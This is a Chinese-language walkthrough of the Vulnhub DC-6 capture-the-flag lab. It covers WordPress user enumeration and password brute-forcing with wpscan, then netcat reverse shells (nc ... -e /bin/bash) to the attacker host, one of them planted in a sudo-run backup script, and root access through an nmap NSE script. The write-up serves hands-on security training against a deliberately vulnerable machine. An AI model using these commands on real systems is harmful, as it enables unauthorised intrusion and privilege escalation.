Vulnhub-DC6靶机渗透实战

admin
admin
admin
138635
文章
114
评论
2024年10月11日13:56:17评论42 views字数 3884阅读12分56秒阅读模式

0x00前言

这是网络安全自修室每周带星球小伙伴一起实战的第5台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知!

靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标!

攻击机:Kali Linux

靶机环境:192.168.241.139

所用工具:nmap | wpscan | nc | BurpSuite

0x01 知识点

  • wpscan爆破
  • nmap提权

0x02 信息搜集

发现打开的端口是8022

sudo masscan --min-rate=10000 192.168.241.139 -p-Vulnhub-DC6靶机渗透实战

对存在的端口进行详细的服务探测

sudo nmap -O -sC -sV 192.168.241.139 -p 80,22 -oN 139.xmlVulnhub-DC6靶机渗透实战

综上信息搜集可以发现,该目标系统为Linux,开放22和80端口,其中web服务是用的Wordpress框架,根据经验,重点从web上突破,考虑用字典爆破后台和ssh服务的账号密码

值得注意的是:发现开了80端口却无法访问,是重定向到wordy域名 可在如下hosts文件中添加ip对应域名

win10路径:C:WindowsSystem32driversetchosts

linux路径:etc/hosts

0x03 获取权限

使用工具wpscan枚举用户,获取到5个用户,保存为users.txt

wpscan --url wordy -e u

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

既然有用户,就只需要找密码本进行爆破即可,这边看到官方有提示,可以提取k01的密码,可以节省爆破时间Vulnhub-DC6靶机渗透实战

根据提示生成密码本

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

开始暴力破解

wpscan --url http://wordy/ -U users.txt -P passwords.txtVulnhub-DC6靶机渗透实战获取到账号密码 mark  helpdesk01

进入后台发现有个active管理插件命令执行漏洞Vulnhub-DC6靶机渗透实战

直接抓包使用nc反弹shell

nc 192.168.241.129 2222 -e /bin/bash

Vulnhub-DC6靶机渗透实战
itkjz

获取交互shell

python -c "import pty;pty.spawn('/bin/bash')"

root@bbkali:/tmp/dc6# nc -lvp 2222
listening on [any] 2222 ...
connect to [192.168.241.129] from wordy [192.168.241.139] 36108
python -c "import pty;pty.spawn('/bin/bash')"

常规翻看目录,发现有价值提示to-do-sometings.txt


www-data@dc-6:/home$ ls -R

.:
graham  jens  mark  sarah

./graham:

./jens:
backups.sh

./mark:
stuff

./mark/stuff:
things-to-do.txt

./sarah:

www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt 

Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

发现graham密码`GSo7isUM1D4

提权

ssh登录graham发现backups.txt可利用提权

graham@dc-6:/home$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:/home$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

直接将nc命令加入backups.sh

graham@dc-6:/home/jens$ cat backups.sh 
nc 192.168.241.129 2223 -e /bin/bash
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh

获取到jens权限,发现能以root用户免密码执行nmap

pwd
/home
whoami
jens
sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

写个nmap脚本

echo 'os.execute("/bin/sh")' > root.nse

运行该脚本获取root权限并拿到flag

sudo nmap --script=/home/jens/root.nse

jens@dc-6:~$ sudo nmap --script=/home/jens/root.nse


Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-07 00:06 AEST
# pwd
/home/jens
# whoami
root
# cd /root
# s^H
/bin/sh: 4: : not found
# ls
theflag.txt
# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

0x04 总结

  • 通过wpscan爆破后台账号密码

  • 后台发现命令注入漏洞插件

  • 使用burp抓包修改数据反弹shell

  • 打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'

  • 进入到home目录查看DC-6的用户目录

  • 发现graham账号的密码,进行ssh登录成功

  • 使用sudo -l查看权限,利用命令脚本转换到jens用户

  • 发现可执行root的文件为nmap

  • 创建一个nmap文件执行脚本,获取到root权限

Vulnhub-DC6靶机渗透实战

 

原文始发于微信公众号(网络安全自修室):每周打靶 | Vulnhub-DC6靶机渗透实战

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月11日13:56:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-DC6靶机渗透实战https://cn-sec.com/archives/1933118.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息